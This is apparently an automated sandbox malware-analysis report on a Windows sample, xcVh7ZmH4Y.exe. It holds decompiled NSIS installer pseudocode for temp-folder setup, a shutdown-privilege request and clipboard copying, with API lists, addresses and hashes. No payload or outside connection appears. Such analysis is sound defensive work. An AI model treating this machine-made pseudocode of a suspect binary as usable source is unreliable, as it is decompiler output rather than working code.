                                                												goto L51;
                                                											}
                                                											asm("cdq");
                                                											asm("cdq");
                                                											asm("cdq");
                                                											_t205 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                                                											_t168 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t210 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
                                                											while( *_t219 != _t205 || _t219[1] != _t168) {
                                                												_t219 = _t219;
                                                												if(_t219 >= L"\"C:\\Users\\engineer\\Desktop\\xcVh7ZmH4Y.exe\" ") {
                                                													continue;
                                                												}
                                                												break;
                                                											}
                                                											_t189 = 0;
                                                											goto L48;
                                                										}
                                                										GetWindowsDirectoryW(_t235, 0x3fb);
                                                										lstrcatW(_t235, L"\\Temp");
                                                										_t171 = E004034FC(_t199, _t253);
                                                										_t254 = _t171;
                                                										if(_t171 != 0) {
                                                											goto L40;
                                                										}
                                                										GetTempPathW(0x3fc, _t235);
                                                										lstrcatW(_t235, L"Low");
                                                										SetEnvironmentVariableW(L"TEMP", _t235);
                                                										SetEnvironmentVariableW(L"TMP", _t235);
                                                										_t176 = E004034FC(_t199, _t254);
                                                										_t255 = _t176;
                                                										if(_t176 == 0) {
                                                											goto L68;
                                                										}
                                                										goto L40;
                                                									}
                                                									goto L31;
                                                								}
                                                								__eflags =  *((intOrPtr*)(_t199 + 4)) - _t227;
                                                								if( *((intOrPtr*)(_t199 + 4)) != _t227) {
                                                									goto L29;
                                                								}
                                                								_t178 =  *((intOrPtr*)(_t199 + 8));
                                                								__eflags = _t178 - 0x20;
                                                								if(_t178 == 0x20) {
                                                									L28:
                                                									_t36 =  &_v20;
                                                									 *_t36 = _v20 | 0x00000004;
                                                									__eflags =  *_t36;
                                                									goto L29;
                                                								}
                                                								__eflags = _t178 - _t189;
                                                								if(_t178 != _t189) {
                                                									goto L29;
                                                								}
                                                								goto L28;
                                                							}
                                                							_t179 =  *((intOrPtr*)(_t199 + 2));
                                                							__eflags = _t179 - _t210;
                                                							if(_t179 == _t210) {
                                                								L23:
                                                								 *0x434fa0 = 1;
                                                								goto L24;
                                                							}
                                                							__eflags = _t179 - _t189;
                                                							if(_t179 != _t189) {
                                                								goto L24;
                                                							}
                                                							goto L23;
                                                						}
                                                					} else {
                                                						goto L16;
                                                					}
                                                					do {
                                                						L16:
                                                						_t199 = _t199 + 2;
                                                						__eflags =  *_t199 - _t210;
                                                					} while ( *_t199 == _t210);
                                                					goto L17;
                                                				}
                                                				goto L37;
                                                			}



















































                                                0x0040353b
                                                0x0040353c
                                                0x00403543
                                                0x00403546
                                                0x0040354d
                                                0x00403550
                                                0x00403563
                                                0x00403569
                                                0x0040356c
                                                0x0040356f
                                                0x0040357d
                                                0x00403585
                                                0x00403590
                                                0x004035a9
                                                0x004035ab
                                                0x004035b3
                                                0x004035b3
                                                0x004035be
                                                0x004035c0
                                                0x004035c0
                                                0x004035d5
                                                0x004035fa
                                                0x00403608
                                                0x0040360b
                                                0x00403612
                                                0x00403619
                                                0x00403619
                                                0x00403612
                                                0x0040361b
                                                0x00403620
                                                0x00403621
                                                0x0040362d
                                                0x00403631
                                                0x00403638
                                                0x00403646
                                                0x0040364b
                                                0x00403652
                                                0x00403656
                                                0x0040365a
                                                0x0040365c
                                                0x0040365c
                                                0x0040365a
                                                0x00403663
                                                0x0040366a
                                                0x00403670
                                                0x00403688
                                                0x00403698
                                                0x0040369d
                                                0x004036a3
                                                0x004036aa
                                                0x004036b1
                                                0x004036b3
                                                0x004036b4
                                                0x004036be
                                                0x004036c5
                                                0x004036c7
                                                0x004036c9
                                                0x004036c9
                                                0x004036dc
                                                0x004036de
                                                0x004037d8
                                                0x004037d8
                                                0x004037db
                                                0x004037de
                                                0x00000000
                                                0x00000000
                                                0x004036e8
                                                0x004036e9
                                                0x004036ec
                                                0x004036f5
                                                0x004036f5
                                                0x004036f8
                                                0x004036fb
                                                0x004036fe
                                                0x00403701
                                                0x00403701
                                                0x00403701
                                                0x00403702
                                                0x00403706
                                                0x004037c6
                                                0x004037cf
                                                0x004037d1
                                                0x004037d4
                                                0x004037d7
                                                0x004037d7
                                                0x004037d7
                                                0x00000000
                                                0x0040370c
                                                0x0040370d
                                                0x0040370e
                                                0x00403712
                                                0x0040372c
                                                0x00403733
                                                0x00403746
                                                0x00403747
                                                0x0040375c
                                                0x00403761
                                                0x00403763
                                                0x00403765
                                                0x00403781
                                                0x00403788
                                                0x0040379b
                                                0x0040379c
                                                0x004037b1
                                                0x004037b7
                                                0x004037b9
                                                0x004037bb
                                                0x004037c3
                                                0x004037c5
                                                0x00000000
                                                0x004037c5
                                                0x004037bf
                                                0x004037c1
                                                0x004037e6
                                                0x004037ea
                                                0x004037f3
                                                0x004037f8
                                                0x004037fe
                                                0x00403809
                                                0x0040380b
                                                0x00403810
                                                0x00403812
                                                0x0040386a
                                                0x0040386f
                                                0x00403878
                                                0x0040387f
                                                0x00403882
                                                0x00403a59
                                                0x00403a59
                                                0x00403a5e
                                                0x00403a67
                                                0x00403a84
                                                0x00403afc
                                                0x00403afc
                                                0x00403b04
                                                0x00403b06
                                                0x00403b06
                                                0x00403b0c
                                                0x00403b0c
                                                0x00403a9b
                                                0x00403aa7
                                                0x00403ab8
                                                0x00403abf
                                                0x00403ac6
                                                0x00403ac6
                                                0x00403ace
                                                0x00403ada
                                                0x00403ae8
                                                0x00403af3
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403adc
                                                0x00403adc
                                                0x00403add
                                                0x00403adf
                                                0x00403ae0
                                                0x00403ae1
                                                0x00403ae6
                                                0x00403af5
                                                0x00403af7
                                                0x00000000
                                                0x00403af7
                                                0x00000000
                                                0x00403ae6
                                                0x00403ada
                                                0x00403a71
                                                0x00403a78
                                                0x00403a78
                                                0x0040388e
                                                0x00403935
                                                0x00403935
                                                0x00403941
                                                0x00000000
                                                0x00403941
                                                0x0040389f
                                                0x004038a7
                                                0x004038f9
                                                0x004038f9
                                                0x004038ff
                                                0x00403906
                                                0x00403954
                                                0x00403956
                                                0x0040395b
                                                0x0040395d
                                                0x00403965
                                                0x00403965
                                                0x00403970
                                                0x0040397c
                                                0x00403982
                                                0x00403984
                                                0x00403a57
                                                0x00403a57
                                                0x00403a57
                                                0x00000000
                                                0x0040398a
                                                0x0040398a
                                                0x0040398c
                                                0x0040398d
                                                0x00403996
                                                0x0040398f
                                                0x0040398f
                                                0x0040398f
                                                0x0040399c
                                                0x004039a4
                                                0x004039ab
                                                0x004039b3
                                                0x004039b3
                                                0x004039c0
                                                0x004039cc
                                                0x004039d6
                                                0x004039d6
                                                0x004039d8
                                                0x004039df
                                                0x004039e9
                                                0x004039f5
                                                0x004039fb
                                                0x00403a01
                                                0x00403a04
                                                0x00403a0e
                                                0x00403a14
                                                0x00403a16
                                                0x00403a1a
                                                0x00403a2b
                                                0x00403a31
                                                0x00403a36
                                                0x00403a38
                                                0x00403a3b
                                                0x00403a41
                                                0x00403a41
                                                0x00403a38
                                                0x00403a16
                                                0x00403a44
                                                0x00403a4b
                                                0x00403a4b
                                                0x00403a4b
                                                0x00403a4b
                                                0x00403a52
                                                0x00000000
                                                0x00403a52
                                                0x00403984
                                                0x00403908
                                                0x0040390b
                                                0x0040390f
                                                0x00403914
                                                0x00403916
                                                0x00000000
                                                0x00000000
                                                0x00403922
                                                0x0040392d
                                                0x00403932
                                                0x00000000
                                                0x00403932
                                                0x004038b0
                                                0x004038c8
                                                0x004038d9
                                                0x004038da
                                                0x004038de
                                                0x004038e0
                                                0x004038ee
                                                0x004038f5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004038f5
                                                0x004038f7
                                                0x00000000
                                                0x004038f7
                                                0x0040381a
                                                0x00403826
                                                0x0040382b
                                                0x00403830
                                                0x00403832
                                                0x00000000
                                                0x00000000
                                                0x0040383a
                                                0x00403842
                                                0x00403853
                                                0x0040385b
                                                0x0040385d
                                                0x00403862
                                                0x00403864
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403864
                                                0x00000000
                                                0x004037c1
                                                0x0040376a
                                                0x0040376c
                                                0x00000000
                                                0x00000000
                                                0x0040376e
                                                0x00403772
                                                0x00403776
                                                0x0040377d
                                                0x0040377d
                                                0x0040377d
                                                0x0040377d
                                                0x00000000
                                                0x0040377d
                                                0x00403778
                                                0x0040377b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040377b
                                                0x00403714
                                                0x00403718
                                                0x0040371b
                                                0x00403722
                                                0x00403722
                                                0x00000000
                                                0x00403722
                                                0x0040371d
                                                0x00403720
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403720
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004036ee
                                                0x004036ee
                                                0x004036ef
                                                0x004036f0
                                                0x004036f0
                                                0x00000000
                                                0x004036ee
                                                0x00000000

                                                APIs
                                                • SetErrorMode.KERNEL32(00008001), ref: 00403550
                                                • GetVersionExW.KERNEL32(?), ref: 00403579
                                                • GetVersionExW.KERNEL32(0000011C), ref: 00403590
                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403627
                                                • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403663
                                                • OleInitialize.OLE32(00000000), ref: 0040366A
                                                • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 00403688
                                                • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 0040369D
                                                • CharNextW.USER32(00000000,"C:\Users\user\Desktop\xcVh7ZmH4Y.exe" ,00000020,"C:\Users\user\Desktop\xcVh7ZmH4Y.exe" ,00000000), ref: 004036D6
                                                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 00403809
                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040381A
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403826
                                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040383A
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403842
                                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403853
                                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040385B
                                                • DeleteFileW.KERNEL32(1033), ref: 0040386F
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403956
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403965
                                                  • Part of subcall function 00405AEB: CreateDirectoryW.KERNEL32(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403970
                                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00441800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\xcVh7ZmH4Y.exe" ,00000000,?), ref: 0040397C
                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040399C
                                                • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,ppingA,?), ref: 004039FB
                                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\xcVh7ZmH4Y.exe,0042AA28,00000001), ref: 00403A0E
                                                • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403A3B
                                                • OleUninitialize.OLE32(?), ref: 00403A5E
                                                • ExitProcess.KERNEL32 ref: 00403A78
                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A8C
                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA7
                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AC6
                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AEB
                                                • ExitProcess.KERNEL32 ref: 00403B0C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                • String ID: "C:\Users\user\Desktop\xcVh7ZmH4Y.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\xcVh7ZmH4Y.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$ppingA$~nsu
                                                • API String ID: 3859024572-4074591092
                                                • Opcode ID: e6a8171330b23895de066e2957319bca12562bbdb6a9eb3577c816747d85f5c1
                                                • Instruction ID: 4d4dc0a58e4858e72561def8a0259f0227da8af974c10a5ea2b310ef4b80d7a5
                                                • Opcode Fuzzy Hash: e6a8171330b23895de066e2957319bca12562bbdb6a9eb3577c816747d85f5c1
                                                • Instruction Fuzzy Hash: 66E10670A00214AADB10AFB59D45BAF3AB8EF4470AF14847FF545B22D1DB7C8A41CB6D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 143 4056de-4056f9 144 405888-40588f 143->144 145 4056ff-4057c6 GetDlgItem * 3 call 4044ce call 404e27 GetClientRect GetSystemMetrics SendMessageW * 2 143->145 147 405891-4058b3 GetDlgItem CreateThread FindCloseChangeNotification 144->147 148 4058b9-4058c6 144->148 163 4057e4-4057e7 145->163 164 4057c8-4057e2 SendMessageW * 2 145->164 147->148 150 4058e4-4058ee 148->150 151 4058c8-4058ce 148->151 155 4058f0-4058f6 150->155 156 405944-405948 150->156 153 4058d0-4058df ShowWindow * 2 call 4044ce 151->153 154 405909-405912 call 404500 151->154 153->150 167 405917-40591b 154->167 160 4058f8-405904 call 404472 155->160 161 40591e-40592e ShowWindow 155->161 156->154 158 40594a-405950 156->158 158->154 165 405952-405965 SendMessageW 158->165 160->154 168 405930-405939 call 40559f 161->168 169 40593e-40593f call 404472 161->169 172 4057f7-40580e call 404499 163->172 173 4057e9-4057f5 SendMessageW 163->173 164->163 174 405a67-405a69 165->174 175 40596b-405996 CreatePopupMenu call 40657a AppendMenuW 165->175 168->169 169->156 182 405810-405824 ShowWindow 172->182 183 405844-405865 GetDlgItem SendMessageW 172->183 173->172 174->167 180 405998-4059a8 GetWindowRect 175->180 181 4059ab-4059c0 TrackPopupMenu 175->181 180->181 181->174 185 4059c6-4059dd 181->185 186 405833 182->186 187 405826-405831 ShowWindow 182->187 183->174 184 40586b-405883 SendMessageW * 2 183->184 184->174 188 4059e2-4059fd SendMessageW 185->188 189 405839-40583f call 4044ce 186->189 187->189 188->188 190 4059ff-405a22 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 188->190 189->183 192 405a24-405a4b SendMessageW 190->192 192->192 193 405a4d-405a61 GlobalUnlock SetClipboardData CloseClipboard 192->193 193->174
                                                C-Code - Quality: 95%
                                                			E004056DE(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                				struct HWND__* _v8;
                                                				long _v12;
                                                				struct tagRECT _v28;
                                                				void* _v36;
                                                				signed int _v40;
                                                				int _v44;
                                                				int _v48;
                                                				signed int _v52;
                                                				int _v56;
                                                				void* _v60;
                                                				void* _v68;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				struct HWND__* _t94;
                                                				long _t95;
                                                				int _t100;
                                                				void* _t108;
                                                				intOrPtr _t119;
                                                				void* _t127;
                                                				intOrPtr _t130;
                                                				struct HWND__* _t134;
                                                				int _t156;
                                                				int _t159;
                                                				struct HMENU__* _t164;
                                                				struct HWND__* _t168;
                                                				struct HWND__* _t169;
                                                				int _t171;
                                                				void* _t172;
                                                				short* _t173;
                                                				short* _t175;
                                                				int _t177;
                                                
                                                				_t169 =  *0x433ee4;
                                                				_t156 = 0;
                                                				_v8 = _t169;
                                                				if(_a8 != 0x110) {
                                                					if(_a8 == 0x405) {
                                                						_t127 = CreateThread(0, 0, E00405672, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
                                                						FindCloseChangeNotification(_t127); // executed
                                                					}
                                                					if(_a8 != 0x111) {
                                                						L17:
                                                						_t171 = 1;
                                                						if(_a8 != 0x404) {
                                                							L25:
                                                							if(_a8 != 0x7b) {
                                                								goto L20;
                                                							}
                                                							_t94 = _v8;
                                                							if(_a12 != _t94) {
                                                								goto L20;
                                                							}
                                                							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                                                							_a8 = _t95;
                                                							if(_t95 <= _t156) {
                                                								L36:
                                                								return 0;
                                                							}
                                                							_t164 = CreatePopupMenu();
                                                							AppendMenuW(_t164, _t156, _t171, E0040657A(_t156, _t164, _t171, _t156, 0xffffffe1));
                                                							_t100 = _a16;
                                                							_t159 = _a16 >> 0x10;
                                                							if(_a16 == 0xffffffff) {
                                                								GetWindowRect(_v8,  &_v28);
                                                								_t100 = _v28.left;
                                                								_t159 = _v28.top;
                                                							}
                                                							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
                                                								_v60 = _t156;
                                                								_v48 = 0x42d268;
                                                								_v44 = 0x1000;
                                                								_a4 = _a8;
                                                								do {
                                                									_a4 = _a4 - 1;
                                                									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
                                                								} while (_a4 != _t156);
                                                								OpenClipboard(_t156);
                                                								EmptyClipboard();
                                                								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                                                								_a4 = _t108;
                                                								_t172 = GlobalLock(_t108);
                                                								do {
                                                									_v48 = _t172;
                                                									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                                                									 *_t173 = 0xd;
                                                									_t175 = _t173 + 2;
                                                									 *_t175 = 0xa;
                                                									_t172 = _t175 + 2;
                                                									_t156 = _t156 + 1;
                                                								} while (_t156 < _a8);
                                                								GlobalUnlock(_a4);
                                                								SetClipboardData(0xd, _a4);
                                                								CloseClipboard();
                                                							}
                                                							goto L36;
                                                						}
                                                						if( *0x433ecc == _t156) {
                                                							ShowWindow( *0x434f08, 8);
                                                							if( *0x434f8c == _t156) {
                                                								_t119 =  *0x42c240; // 0x71af4c
                                                								E0040559F( *((intOrPtr*)(_t119 + 0x34)), _t156);
                                                							}
                                                							E00404472(_t171);
                                                							goto L25;
                                                						}
                                                						 *0x42ba38 = 2;
                                                						E00404472(0x78);
                                                						goto L20;
                                                					} else {
                                                						if(_a12 != 0x403) {
                                                							L20:
                                                							return E00404500(_a8, _a12, _a16);
                                                						}
                                                						ShowWindow( *0x433ed0, _t156);
                                                						ShowWindow(_t169, 8);
                                                						E004044CE(_t169);
                                                						goto L17;
                                                					}
                                                				}
                                                				_v52 = _v52 | 0xffffffff;
                                                				_v40 = _v40 | 0xffffffff;
                                                				_t177 = 2;
                                                				_v60 = _t177;
                                                				_v56 = 0;
                                                				_v48 = 0;
                                                				_v44 = 0;
                                                				asm("stosd");
                                                				asm("stosd");
                                                				_t130 =  *0x434f10;
                                                				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                                                				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                                                				 *0x433ed0 = GetDlgItem(_a4, 0x403);
                                                				 *0x433ec8 = GetDlgItem(_a4, 0x3ee);
                                                				_t134 = GetDlgItem(_a4, 0x3f8);
                                                				 *0x433ee4 = _t134;
                                                				_v8 = _t134;
                                                				E004044CE( *0x433ed0);
                                                				 *0x433ed4 = E00404E27(4);
                                                				 *0x433eec = 0;
                                                				GetClientRect(_v8,  &_v28);
                                                				_v52 = _v28.right - GetSystemMetrics(_t177);
                                                				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
                                                				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
                                                				if(_a8 >= 0) {
                                                					SendMessageW(_v8, 0x1001, 0, _a8);
                                                					SendMessageW(_v8, 0x1026, 0, _a8);
                                                				}
                                                				if(_a12 >= _t156) {
                                                					SendMessageW(_v8, 0x1024, _t156, _a12);
                                                				}
                                                				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                				_push(0x1b);
                                                				E00404499(_a4);
                                                				if(( *0x434f18 & 0x00000003) != 0) {
                                                					ShowWindow( *0x433ed0, _t156);
                                                					if(( *0x434f18 & 0x00000002) != 0) {
                                                						 *0x433ed0 = _t156;
                                                					} else {
                                                						ShowWindow(_v8, 8);
                                                					}
                                                					E004044CE( *0x433ec8);
                                                				}
                                                				_t168 = GetDlgItem(_a4, 0x3ec);
                                                				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                                                				if(( *0x434f18 & 0x00000004) != 0) {
                                                					SendMessageW(_t168, 0x409, _t156, _a12);
                                                					SendMessageW(_t168, 0x2001, _t156, _a8);
                                                				}
                                                				goto L36;
                                                			}



































                                                0x004056e6
                                                0x004056ec
                                                0x004056f6
                                                0x004056f9
                                                0x0040588f
                                                0x004058ac
                                                0x004058b3
                                                0x004058b3
                                                0x004058c6
                                                0x004058e4
                                                0x004058e6
                                                0x004058ee
                                                0x00405944
                                                0x00405948
                                                0x00000000
                                                0x00000000
                                                0x0040594a
                                                0x00405950
                                                0x00000000
                                                0x00000000
                                                0x0040595a
                                                0x00405962
                                                0x00405965
                                                0x00405a67
                                                0x00000000
                                                0x00405a67
                                                0x00405974
                                                0x0040597f
                                                0x00405988
                                                0x00405993
                                                0x00405996
                                                0x0040599f
                                                0x004059a5
                                                0x004059a8
                                                0x004059a8
                                                0x004059c0
                                                0x004059c9
                                                0x004059cc
                                                0x004059d3
                                                0x004059da
                                                0x004059e2
                                                0x004059e2
                                                0x004059f9
                                                0x004059f9
                                                0x00405a00
                                                0x00405a06
                                                0x00405a12
                                                0x00405a19
                                                0x00405a22
                                                0x00405a24
                                                0x00405a27
                                                0x00405a36
                                                0x00405a39
                                                0x00405a3f
                                                0x00405a40
                                                0x00405a46
                                                0x00405a47
                                                0x00405a48
                                                0x00405a50
                                                0x00405a5b
                                                0x00405a61
                                                0x00405a61
                                                0x00000000
                                                0x004059c0
                                                0x004058f6
                                                0x00405926
                                                0x0040592e
                                                0x00405930
                                                0x00405939
                                                0x00405939
                                                0x0040593f
                                                0x00000000
                                                0x0040593f
                                                0x004058fa
                                                0x00405904
                                                0x00000000
                                                0x004058c8
                                                0x004058ce
                                                0x00405909
                                                0x00000000
                                                0x00405912
                                                0x004058d7
                                                0x004058dc
                                                0x004058df
                                                0x00000000
                                                0x004058df
                                                0x004058c6
                                                0x004056ff
                                                0x00405703
                                                0x0040570b
                                                0x0040570f
                                                0x00405712
                                                0x00405715
                                                0x00405718
                                                0x0040571b
                                                0x0040571c
                                                0x0040571d
                                                0x00405736
                                                0x00405739
                                                0x00405743
                                                0x00405752
                                                0x0040575a
                                                0x00405762
                                                0x00405767
                                                0x0040576a
                                                0x00405776
                                                0x0040577f
                                                0x00405788
                                                0x004057aa
                                                0x004057b0
                                                0x004057c1
                                                0x004057c6
                                                0x004057d4
                                                0x004057e2
                                                0x004057e2
                                                0x004057e7
                                                0x004057f5
                                                0x004057f5
                                                0x004057fa
                                                0x004057fd
                                                0x00405802
                                                0x0040580e
                                                0x00405817
                                                0x00405824
                                                0x00405833
                                                0x00405826
                                                0x0040582b
                                                0x0040582b
                                                0x0040583f
                                                0x0040583f
                                                0x00405853
                                                0x0040585c
                                                0x00405865
                                                0x00405875
                                                0x00405881
                                                0x00405881
                                                0x00000000

                                                APIs
                                                • GetDlgItem.USER32 ref: 0040573C
                                                • GetDlgItem.USER32 ref: 0040574B
                                                • GetClientRect.USER32 ref: 00405788
                                                • GetSystemMetrics.USER32 ref: 0040578F
                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B0
                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C1
                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D4
                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E2
                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057F5
                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405817
                                                • ShowWindow.USER32(?,00000008), ref: 0040582B
                                                • GetDlgItem.USER32 ref: 0040584C
                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040585C
                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405875
                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405881
                                                • GetDlgItem.USER32 ref: 0040575A
                                                  • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                • GetDlgItem.USER32 ref: 0040589E
                                                • CreateThread.KERNEL32 ref: 004058AC
                                                • FindCloseChangeNotification.KERNEL32(00000000), ref: 004058B3
                                                • ShowWindow.USER32(00000000), ref: 004058D7
                                                • ShowWindow.USER32(?,00000008), ref: 004058DC
                                                • ShowWindow.USER32(00000008), ref: 00405926
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595A
                                                • CreatePopupMenu.USER32 ref: 0040596B
                                                • AppendMenuW.USER32 ref: 0040597F
                                                • GetWindowRect.USER32 ref: 0040599F
                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059B8
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F0
                                                • OpenClipboard.USER32(00000000), ref: 00405A00
                                                • EmptyClipboard.USER32 ref: 00405A06
                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A12
                                                • GlobalLock.KERNEL32 ref: 00405A1C
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A30
                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405A50
                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00405A5B
                                                • CloseClipboard.USER32 ref: 00405A61
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                • String ID: {
                                                • API String ID: 4154960007-366298937
